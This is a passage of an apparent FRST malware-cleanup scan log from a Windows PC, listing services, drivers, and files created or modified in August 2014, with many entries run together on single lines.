R2 DockLoginService; C:\Program Files\Dell\DellDock\DockLogin.exe [161048 2008-04-28] (Stardock Corporation)
R2 dwmrcs; C:\Windows\dwrcs\DWRCS.EXE [705384 2012-11-02] (SolarWinds)
R3 hpqcxs08; C:\Program Files\HP\Digital Imaging\bin\hpqcxs08.dll [217088 2008-10-16] (Hewlett-Packard Co.) [File not signed]
R2 hpqddsvc; C:\Program Files\HP\Digital Imaging\bin\hpqddsvc.dll [135168 2008-10-16] (Hewlett-Packard Co.) [File not signed]
R2 HPSLPSVC; C:\Program Files\HP\Digital Imaging\bin\HPSLPSVC32.DLL [634880 2008-10-16] (Hewlett-Packard Co.) [File not signed]
S3 jswpsapi; C:\Program Files\NETGEAR\WNA1100\jswpsapi.exe [960992 2010-03-22] (Atheros Communications, Inc.)
R2 lxbl_device; C:\Windows\system32\lxblcoms.exe [537520 2007-04-20] ( )
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [44032 2008-07-18] (Hewlett-Packard) [File not signed]
S3 NisSrv; c:\Program Files\Microsoft Security Client\Antimalware\NisSrv.exe [208944 2011-04-27] (Microsoft Corporation)
R2 PassThru Service; C:\Program Files\HTC\Internet Pass-Through\PassThruSvr.exe [87040 2012-03-23] () [File not signed]
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [53760 2008-07-18] (Hewlett-Packard) [File not signed]
R2 WSWNA1100; C:\Program Files\NETGEAR\WNA1100\WifiSvc.exe [266240 2010-08-04] () [File not signed]
S2 vToolbarUpdater; C:\Program Files\Common Files\AVG Secure Search\vToolbarUpdater\9.0.1\ToolbarUpdater.exe [X]

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

S3 athur; C:\Windows\System32\DRIVERS\athur.sys [1439744 2010-10-10] (Atheros Communications, Inc.)
R0 AVGIDSHX; C:\Windows\System32\DRIVERS\avgidshx.sys [147736 2014-06-17] (AVG Technologies CZ, s.r.o.)
R1 Avgldx86; C:\Windows\System32\DRIVERS\avgldx86.sys [248656 2011-01-07] (AVG Technologies CZ, s.r.o.)
R1 Avgmfx86; C:\Windows\System32\DRIVERS\avgmfx86.sys [34896 2011-03-01] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx86; C:\Windows\System32\DRIVERS\avgrkx86.sys [32592 2011-03-16] (AVG Technologies CZ, s.r.o.)
R1 Avgtdix; C:\Windows\System32\DRIVERS\avgtdix.sys [297168 2011-04-05] (AVG Technologies CZ, s.r.o.)
R0 BootDefragDriver; C:\Windows\System32\drivers\BootDefragDriver.sys [16064 2014-07-18] (Glarysoft Ltd)
S3 gfiark; C:\Windows\System32\drivers\gfiark.sys [43368 2013-05-23] (ThreatTrack Security)
R1 GUBootStartup; C:\Windows\System32\drivers\GUBootStartup.sys [17216 2014-08-14] (Glarysoft Ltd)
R1 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [165648 2011-04-18] (Microsoft Corporation)
S3 MpNWMon; C:\Windows\System32\DRIVERS\MpNWMon.sys [43392 2011-04-18] (Microsoft Corporation)
R2 RtNdPt60; C:\Windows\System32\DRIVERS\RtNdPt60.sys [27648 2008-03-06] (Windows ® Codename Longhorn DDK provider)
R0 SCMNdisP; C:\Windows\System32\DRIVERS\scmndisp.sys [21728 2007-01-19] (Windows ® Codename Longhorn DDK provider)
S3 USBAAPL; C:\Windows\System32\Drivers\usbaapl.sys [42496 2011-08-02] (Apple, Inc.) [File not signed]
U5 AppMgmt; C:\Windows\system32\svchost.exe [21504 2008-01-20] (Microsoft Corporation)
S1 AVGIDSDriver; system32\DRIVERS\avgidsdriverx.sys [X]
S1 AVGIDSShim; system32\DRIVERS\avgidsshimx.sys [X]
R3 catchme; \??\C:\Users\SAVAS~1.KYR\AppData\Local\Temp\catchme.sys [X]
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S1 MpKslb9ee2848; \??\c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{BFB5F758-88DD-40A2-8570-9299F94880E8}\MpKslb9ee2848.sys [X]
S1 MpKslbb89cfa8; \??\c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{A306A4ED-0116-4B29-AE29-DC65EC41A044}\MpKslbb89cfa8.sys [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]
S3 SWDUMon; system32\DRIVERS\SWDUMon.sys [X]
S3 TfNetMon; \??\C:\Windows\system32\drivers\TfNetMon.sys [X]
U3 mbr; \??\C:\ComboFix\mbr.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)

==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-08-25 11:10 - 2014-08-25 11:10 - 00043997 _____ () C:\ComboFix.txt2014-08-25 10:53 - 2014-08-25 11:10 - 00000000 ____D () C:\ComboFix2014-08-23 16:54 - 2014-08-25 13:41 - 00000000 ____D () C:\FRST2014-08-23 16:30 - 2014-08-25 09:35 - 00110296 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys2014-08-23 16:30 - 2014-08-25 08:26 - 00000901 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk2014-08-23 16:30 - 2014-08-25 08:26 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware2014-08-23 16:30 - 2014-08-25 08:26 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware2014-08-23 16:30 - 2014-05-12 07:26 - 00051928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys2014-08-23 16:30 - 2014-05-12 07:25 - 00074456 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys2014-08-23 16:30 - 2014-05-12 07:25 - 00023256 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys2014-08-23 12:25 - 2011-06-26 02:45 - 00256000 _____ () C:\Windows\PEV.exe2014-08-23 12:25 - 2010-11-07 13:20 - 00208896 _____ () C:\Windows\MBR.exe2014-08-23 12:25 - 2009-04-20 00:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe2014-08-23 12:25 - 2000-08-30 20:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe2014-08-23 12:25 - 2000-08-30 20:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe2014-08-23 12:25 - 2000-08-30 20:00 - 00098816 _____ () C:\Windows\sed.exe2014-08-23 12:25 - 2000-08-30 20:00 - 00080412 _____ () C:\Windows\grep.exe2014-08-23 12:25 - 2000-08-30 20:00 - 00068096 _____ () C:\Windows\zip.exe2014-08-23 12:12 - 2014-08-23 12:12 - 00007836 _____ () C:\Users\savas.kyriakidis\Desktop\reg.txt2014-08-23 12:03 - 2014-08-23 12:03 - 00009362 _____ () C:\Users\savas.kyriakidis\Desktop\safer.txt2014-08-23 11:51 - 2014-08-23 11:53 - 00000000 ____D () C:\AdwCleaner2014-08-23 11:49 - 2014-08-23 11:49 - 00007919 _____ () 
C:\Users\savas.kyriakidis\Desktop\JRT.txt2014-08-23 11:42 - 2014-08-23 11:42 - 00000000 ____D () C:\Windows\ERUNT2014-08-22 17:06 - 2013-09-04 14:57 - 00024040 _____ (ThreatTrack Security) C:\Windows\system32\Drivers\gfiutil.sys2014-08-22 17:06 - 2013-05-23 08:39 - 00043368 _____ (ThreatTrack Security) C:\Windows\system32\Drivers\gfiark.sys2014-08-22 17:05 - 2014-08-22 21:40 - 00000000 ____D () C:\VIPRERESCUE2014-08-22 17:05 - 2014-08-22 17:05 - 00000000 ____D () C:\EEK2014-08-22 16:12 - 2014-08-25 10:47 - 00040016 _____ () C:\Windows\PFRO.log2014-08-22 15:52 - 2014-08-25 11:10 - 00000000 ____D () C:\Qoobox2014-08-22 14:32 - 2014-08-22 14:32 - 00000000 ____D () C:\Users\savas.kyriakidis\Documents\ProcAlyzer Dumps2014-08-22 14:00 - 2014-08-23 16:48 - 00000000 ____D () C:\ProgramData\HitmanPro2014-08-22 13:41 - 2014-08-22 13:54 - 00000000 ____D () C:\Windows\dwrcs2014-08-22 13:41 - 2014-08-22 13:41 - 00000000 ____D () C:\ProgramData\DameWare Development2014-08-22 13:25 - 2014-08-25 13:39 - 00001564 _____ () C:\Windows\setupact.log2014-08-22 13:25 - 2014-08-22 13:25 - 00000000 _____ () C:\Windows\setuperr.log2014-08-20 19:17 - 2014-08-20 19:17 - 00319456 _____ (Microsoft Corporation) C:\Windows\DIFxAPI.dll2014-08-20 18:46 - 2014-08-20 18:46 - 00000666 _____ () C:\Toolbars.dat2014-08-20 18:12 - 2014-08-19 18:12 - 00075264 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dfsc.sys2014-08-20 18:08 - 2014-08-20 18:08 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\UINoteworthy2014-08-19 23:07 - 2014-08-19 23:07 - 00000000 ____D () C:\ProgramData\GlarySoft2014-08-17 16:29 - 2014-08-17 16:29 - 04763288 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_avct_stb_all_2014_4745.exe2014-08-17 15:54 - 2014-08-17 15:54 - 04462440 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_avct_stb_all_2014_4335_welcomecmp.exe2014-08-16 17:57 - 2014-08-17 17:23 - 00000000 ____D () C:\ProgramData\AVG20142014-08-16 17:05 - 2014-08-16 17:05 - 
00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\MFAData2014-08-16 17:05 - 2014-08-16 17:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Avg20142014-08-16 17:04 - 2014-08-16 17:05 - 04755832 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_free_stb_all_2014_4744_cnet.exe2014-08-16 12:05 - 2014-08-16 12:05 - 00000000 ____D () C:\ProgramData\SlimWare Utilities Inc2014-08-16 12:04 - 2014-08-16 12:04 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Downloaded Installers2014-08-15 20:57 - 2014-08-16 12:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\SlimWare Utilities Inc2014-08-15 20:56 - 2014-08-16 09:22 - 00000000 ____D () C:\Program Files\DriverUpdate2014-08-15 20:56 - 2014-08-15 20:56 - 00000000 ____D () C:\Users\Public\Documents\Downloaded Installers2014-08-15 13:32 - 2014-08-15 13:32 - 06534584 _____ (Systweak Software ) C:\Users\savas.kyriakidis\Downloads\PCDiagnosisProTPSSetup.exe2014-08-15 13:23 - 2014-08-15 13:23 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (3).exe2014-08-15 13:12 - 2014-08-15 13:13 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (2).exe2014-08-15 13:11 - 2014-08-15 13:11 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (1).exe2014-08-15 13:04 - 2014-08-15 13:21 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\TeamViewer2014-08-15 13:02 - 2014-08-15 13:02 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en.exe2014-08-15 11:17 - 2014-08-15 11:17 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_150803173445318587.exe2014-08-15 11:17 - 2014-08-15 11:17 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_150803172000784607.exe2014-08-15 11:12 - 2014-08-15 11:13 - 17292760 _____ (Malwarebytes Corporation ) 
C:\Users\savas.kyriakidis\Downloads\mbam-setup-2.0.2.1012 (1).exe2014-08-15 11:11 - 2014-08-15 11:12 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\savas.kyriakidis\Downloads\mbam-setup-2.0.2.1012.exe2014-08-14 19:24 - 2014-08-14 19:24 - 00000000 ___HD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup-Disabled2014-08-14 18:20 - 2014-08-25 10:49 - 00000342 _____ () C:\Windows\Tasks\GlaryInitialize 5.job2014-08-14 18:20 - 2014-08-20 23:44 - 00000891 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 5.lnk2014-08-14 18:20 - 2014-08-20 23:44 - 00000879 _____ () C:\Users\Public\Desktop\Glary Utilities 5.lnk2014-08-14 18:20 - 2014-08-14 18:20 - 00017216 _____ (Glarysoft Ltd) C:\Windows\system32\Drivers\GUBootStartup.sys2014-08-14 18:20 - 2014-08-14 18:20 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 52014-08-14 18:19 - 2014-08-25 10:49 - 00000000 ____D () C:\Program Files\Glary Utilities 52014-08-14 18:19 - 2014-08-23 11:16 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\DiskDefrag2014-08-14 18:19 - 2014-08-14 18:19 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\GlarySoft2014-08-14 18:19 - 2014-08-04 03:06 - 00101664 _____ (Glarysoft Ltd) C:\Windows\system32\BootDefrag.exe2014-08-14 18:19 - 2014-07-18 03:11 - 00016064 _____ (Glarysoft Ltd) C:\Windows\system32\Drivers\BootDefragDriver.sys2014-08-14 18:18 - 2014-08-14 18:18 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (5).exe2014-08-14 18:18 - 2014-08-14 18:18 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (4).exe2014-08-14 18:15 - 2014-08-14 18:16 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (3).exe2014-08-14 18:15 - 2014-08-14 18:15 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (2).exe2014-08-14 18:14 - 2014-08-14 18:14 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (1).exe2014-08-14 18:13 - 2014-08-14 18:13 - 
14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup.exe2014-08-14 17:37 - 2014-08-14 17:40 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809374825884190.exe2014-08-14 17:37 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809372042763201.exe2014-08-14 17:37 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809371092783465.exe2014-08-13 21:31 - 2014-08-13 21:31 - 00001666 _____ () C:\Users\Public\Desktop\iTunes.lnk2014-08-13 21:31 - 2014-08-13 21:31 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes2014-08-13 21:28 - 2014-08-13 21:31 - 00000000 ____D () C:\ProgramData\188F1432-103A-4ffb-80F1-36B633C5C9E12014-08-13 21:28 - 2014-08-13 21:28 - 00000000 ____D () C:\Program Files\iPod2014-08-13 20:51 - 2014-08-13 20:52 - 00000000 ____D () C:\Program Files\QuickTime2014-08-13 20:51 - 2014-08-13 20:51 - 00001728 _____ () C:\Users\Public\Desktop\QuickTime Player.lnk2014-08-13 20:51 - 2014-08-13 20:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickTime2014-08-12 21:20 - 2014-08-12 21:20 - 00000000 ____D () C:\ProgramData\WindowsSearch2014-08-12 18:03 - 2014-08-12 18:03 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\42a4952014-08-12 18:02 - 2014-08-22 16:10 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\42a4952014-08-12 17:58 - 2014-08-15 03:47 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\browser_dir2014-08-12 16:53 - 2014-08-22 21:40 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\Puorfu2014-08-12 16:51 - 2014-08-25 09:16 - 00000000 ____D () C:\ProgramData\IrfuqApivh ==================== One Month Modified Files and Folders ======= (If an entry is included in the fixlist, the file\folder will be moved.) 
2014-08-25 13:41 - 2014-08-23 16:54 - 00000000 ____D () C:\FRST2014-08-25 13:40 - 2006-11-02 06:33 - 00694332 _____ () C:\Windows\system32\PerfStringBackup.INI2014-08-25 13:39 - 2014-08-22 13:25 - 00001564 _____ () C:\Windows\setupact.log2014-08-25 13:39 - 2014-07-18 00:39 - 01282029 _____ () C:\Windows\WindowsUpdate.log2014-08-25 12:47 - 2006-11-02 08:47 - 00003616 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A02014-08-25 12:47 - 2006-11-02 08:47 - 00003616 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A02014-08-25 11:10 - 2014-08-25 11:10 - 00043997 _____ () C:\ComboFix.txt2014-08-25 11:10 - 2014-08-25 10:53 - 00000000 ____D () C:\ComboFix2014-08-25 11:10 - 2014-08-22 15:52 - 00000000 ____D () C:\Qoobox2014-08-25 11:08 - 2006-11-02 06:23 - 00000215 _____ () C:\Windows\system.ini2014-08-25 10:50 - 2011-12-22 18:52 - 00001356 _____ () C:\Users\savas.kyriakidis\AppData\Local\d3d9caps.dat2014-08-25 10:49 - 2014-08-14 18:20 - 00000342 _____ () C:\Windows\Tasks\GlaryInitialize 5.job2014-08-25 10:49 - 2014-08-14 18:19 - 00000000 ____D () C:\Program Files\Glary Utilities 52014-08-25 10:48 - 2008-08-06 12:35 - 00000276 _____ () C:\Windows\Tasks\RtlNICDiagVistaStart.job2014-08-25 10:47 - 2014-08-22 16:12 - 00040016 _____ () C:\Windows\PFRO.log2014-08-25 10:47 - 2006-11-02 09:01 - 00000006 ____H () C:\Windows\Tasks\SA.DAT2014-08-25 10:46 - 2006-11-02 09:01 - 00032640 _____ () C:\Windows\Tasks\SCHEDLGU.TXT2014-08-25 09:54 - 2011-03-06 00:06 - 00047104 _____ () C:\Users\savas.kyriakidis\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini2014-08-25 09:35 - 2014-08-23 16:30 - 00110296 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys2014-08-25 09:16 - 2014-08-12 16:51 - 00000000 ____D () C:\ProgramData\IrfuqApivh2014-08-25 09:16 - 2006-11-02 07:18 - 00000000 ____D () C:\Windows\system2014-08-25 08:26 - 2014-08-23 16:30 - 00000901 
_____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk2014-08-25 08:26 - 2014-08-23 16:30 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware2014-08-25 08:26 - 2014-08-23 16:30 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware2014-08-24 15:38 - 2011-12-29 11:34 - 00000000 ____D () C:\Windows\ERDNT2014-08-23 16:48 - 2014-08-22 14:00 - 00000000 ____D () C:\ProgramData\HitmanPro2014-08-23 16:30 - 2011-03-14 18:46 - 00000000 ____D () C:\ProgramData\Malwarebytes2014-08-23 14:45 - 2006-11-02 07:18 - 00000000 ____D () C:\Windows\schemas2014-08-23 14:32 - 2011-03-14 18:43 - 00000000 ____D () C:\Windows\pss2014-08-23 14:22 - 2006-11-02 07:18 - 00000000 ___RD () C:\Users\Public2014-08-23 14:09 - 2011-03-06 00:06 - 00000000 ____D () C:\Users\savas.kyriakidis2014-08-23 14:09 - 2011-02-10 21:08 - 00000000 ____D () C:\Users\Rita2014-08-23 12:12 - 2014-08-23 12:12 - 00007836 _____ () C:\Users\savas.kyriakidis\Desktop\reg.txt2014-08-23 12:03 - 2014-08-23 12:03 - 00009362 _____ () C:\Users\savas.kyriakidis\Desktop\safer.txt2014-08-23 11:53 - 2014-08-23 11:51 - 00000000 ____D () C:\AdwCleaner2014-08-23 11:49 - 2014-08-23 11:49 - 00007919 _____ () C:\Users\savas.kyriakidis\Desktop\JRT.txt2014-08-23 11:42 - 2014-08-23 11:42 - 00000000 ____D () C:\Windows\ERUNT2014-08-23 11:16 - 2014-08-14 18:19 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\DiskDefrag2014-08-22 21:40 - 2014-08-22 17:05 - 00000000 ____D () C:\VIPRERESCUE2014-08-22 21:40 - 2014-08-12 16:53 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\Puorfu2014-08-22 17:13 - 2012-05-16 21:52 - 00000000 ____D () C:\temp2014-08-22 17:05 - 2014-08-22 17:05 - 00000000 ____D () C:\EEK2014-08-22 16:10 - 2014-08-12 18:02 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\42a4952014-08-22 14:32 - 2014-08-22 14:32 - 00000000 ____D () C:\Users\savas.kyriakidis\Documents\ProcAlyzer Dumps2014-08-22 14:15 - 2011-12-22 20:05 - 00000000 ____D 
() C:\ProgramData\AVAST Software2014-08-22 13:54 - 2014-08-22 13:41 - 00000000 ____D () C:\Windows\dwrcs2014-08-22 13:41 - 2014-08-22 13:41 - 00000000 ____D () C:\ProgramData\DameWare Development2014-08-22 13:25 - 2014-08-22 13:25 - 00000000 _____ () C:\Windows\setuperr.log2014-08-21 00:06 - 2011-03-06 00:06 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Google2014-08-20 23:44 - 2014-08-14 18:20 - 00000891 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 5.lnk2014-08-20 23:44 - 2014-08-14 18:20 - 00000879 _____ () C:\Users\Public\Desktop\Glary Utilities 5.lnk2014-08-20 23:39 - 2008-08-06 12:41 - 00000000 ____D () C:\Program Files\Google2014-08-20 20:00 - 2009-06-10 23:44 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lexmark Z700-P700 Series2014-08-20 19:17 - 2014-08-20 19:17 - 00319456 _____ (Microsoft Corporation) C:\Windows\DIFxAPI.dll2014-08-20 18:46 - 2014-08-20 18:46 - 00000666 _____ () C:\Toolbars.dat2014-08-20 18:08 - 2014-08-20 18:08 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\UINoteworthy2014-08-19 23:07 - 2014-08-19 23:07 - 00000000 ____D () C:\ProgramData\GlarySoft2014-08-19 18:12 - 2014-08-20 18:12 - 00075264 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dfsc.sys2014-08-17 17:23 - 2014-08-16 17:57 - 00000000 ____D () C:\ProgramData\AVG20142014-08-17 17:23 - 2011-07-10 20:09 - 00000000 ____D () C:\$AVG2014-08-17 16:31 - 2011-07-10 19:21 - 00000000 ____D () C:\ProgramData\MFAData2014-08-17 16:29 - 2014-08-17 16:29 - 04763288 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_avct_stb_all_2014_4745.exe2014-08-17 15:54 - 2014-08-17 15:54 - 04462440 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_avct_stb_all_2014_4335_welcomecmp.exe2014-08-16 18:01 - 2011-07-10 19:25 - 00000000 ____D () C:\Program Files\AVG2014-08-16 17:05 - 2014-08-16 17:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\MFAData2014-08-16 17:05 - 
2014-08-16 17:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Avg20142014-08-16 17:05 - 2014-08-16 17:04 - 04755832 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_free_stb_all_2014_4744_cnet.exe2014-08-16 12:05 - 2014-08-16 12:05 - 00000000 ____D () C:\ProgramData\SlimWare Utilities Inc2014-08-16 12:05 - 2014-08-15 20:57 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\SlimWare Utilities Inc2014-08-16 12:04 - 2014-08-16 12:04 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Downloaded Installers2014-08-16 10:06 - 2012-10-02 18:32 - 00000000 ____D () C:\Program Files\HTC2014-08-16 09:27 - 2008-08-06 12:49 - 00000000 ____D () C:\Program Files\Citrix2014-08-16 09:22 - 2014-08-15 20:56 - 00000000 ____D () C:\Program Files\DriverUpdate2014-08-15 20:56 - 2014-08-15 20:56 - 00000000 ____D () C:\Users\Public\Documents\Downloaded Installers2014-08-15 20:41 - 2012-10-02 18:45 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Htc2014-08-15 19:55 - 2008-08-06 12:37 - 00000000 ____D () C:\Program Files\Microsoft Office2014-08-15 17:56 - 2006-11-02 08:47 - 00267048 _____ () C:\Windows\system32\FNTCACHE.DAT2014-08-15 13:32 - 2014-08-15 13:32 - 06534584 _____ (Systweak Software ) C:\Users\savas.kyriakidis\Downloads\PCDiagnosisProTPSSetup.exe2014-08-15 13:26 - 2011-06-17 17:39 - 00058896 _____ () C:\Windows\system32\GDIPFONTCACHEV1.DAT2014-08-15 13:23 - 2014-08-15 13:23 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (3).exe2014-08-15 13:21 - 2014-08-15 13:04 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\TeamViewer2014-08-15 13:13 - 2014-08-15 13:12 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (2).exe2014-08-15 13:11 - 2014-08-15 13:11 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (1).exe2014-08-15 13:02 - 2014-08-15 13:02 - 06267504 _____ (TeamViewer GmbH) 
C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en.exe2014-08-15 13:01 - 2012-01-24 17:09 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\LogMeIn Rescue Applet2014-08-15 11:17 - 2014-08-15 11:17 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_150803173445318587.exe2014-08-15 11:17 - 2014-08-15 11:17 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_150803172000784607.exe2014-08-15 11:13 - 2014-08-15 11:12 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\savas.kyriakidis\Downloads\mbam-setup-2.0.2.1012 (1).exe2014-08-15 11:12 - 2014-08-15 11:11 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\savas.kyriakidis\Downloads\mbam-setup-2.0.2.1012.exe2014-08-15 03:47 - 2014-08-12 17:58 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\browser_dir2014-08-14 19:24 - 2014-08-14 19:24 - 00000000 ___HD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup-Disabled2014-08-14 18:20 - 2014-08-14 18:20 - 00017216 _____ (Glarysoft Ltd) C:\Windows\system32\Drivers\GUBootStartup.sys2014-08-14 18:20 - 2014-08-14 18:20 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 52014-08-14 18:19 - 2014-08-14 18:19 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\GlarySoft2014-08-14 18:18 - 2014-08-14 18:18 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (5).exe2014-08-14 18:18 - 2014-08-14 18:18 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (4).exe2014-08-14 18:16 - 2014-08-14 18:15 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (3).exe2014-08-14 18:15 - 2014-08-14 18:15 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (2).exe2014-08-14 18:14 - 2014-08-14 18:14 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (1).exe2014-08-14 18:13 - 2014-08-14 18:13 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup.exe2014-08-14 17:40 - 2014-08-14 17:37 - 03552760 
_____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809374825884190.exe2014-08-14 17:37 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809372042763201.exe2014-08-14 17:37 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809371092783465.exe2014-08-13 23:07 - 2013-06-10 19:17 - 00002463 _____ () C:\Users\Public\Desktop\Transporter.lnk2014-08-13 21:31 - 2014-08-13 21:31 - 00001666 _____ () C:\Users\Public\Desktop\iTunes.lnk2014-08-13 21:31 - 2014-08-13 21:31 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes2014-08-13 21:31 - 2014-08-13 21:28 - 00000000 ____D () C:\ProgramData\188F1432-103A-4ffb-80F1-36B633C5C9E12014-08-13 21:31 - 2011-12-24 11:26 - 00000000 ____D () C:\Program Files\iTunes2014-08-13 21:28 - 2014-08-13 21:28 - 00000000 ____D () C:\Program Files\iPod2014-08-13 21:28 - 2008-09-02 12:28 - 00000000 ____D () C:\Program Files\Common Files\Apple2014-08-13 21:02 - 2008-09-02 12:28 - 00000000 ____D () C:\ProgramData\Apple2014-08-13 20:52 - 2014-08-13 20:51 - 00000000 ____D () C:\Program Files\QuickTime2014-08-13 20:51 